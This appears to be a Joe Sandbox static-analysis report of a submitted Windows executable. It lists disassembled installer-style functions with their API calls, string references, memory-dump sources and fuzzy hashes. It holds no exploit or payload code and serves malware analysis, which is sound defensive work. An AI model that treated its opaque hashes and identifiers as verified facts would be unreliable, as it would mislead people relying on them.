Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040498A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,00432EA0), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

A, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
., xrefs: 00405D04
., xrefs: 00405D18
\*.*, xrefs: 00405CB4

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4130279798
Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 542301482-455884830
Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

, xrefs: 004054D4
M, xrefs: 004050BA
N, xrefs: 0040519B

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
EnableWindow.USER32(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

N, xrefs: 004047F4

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
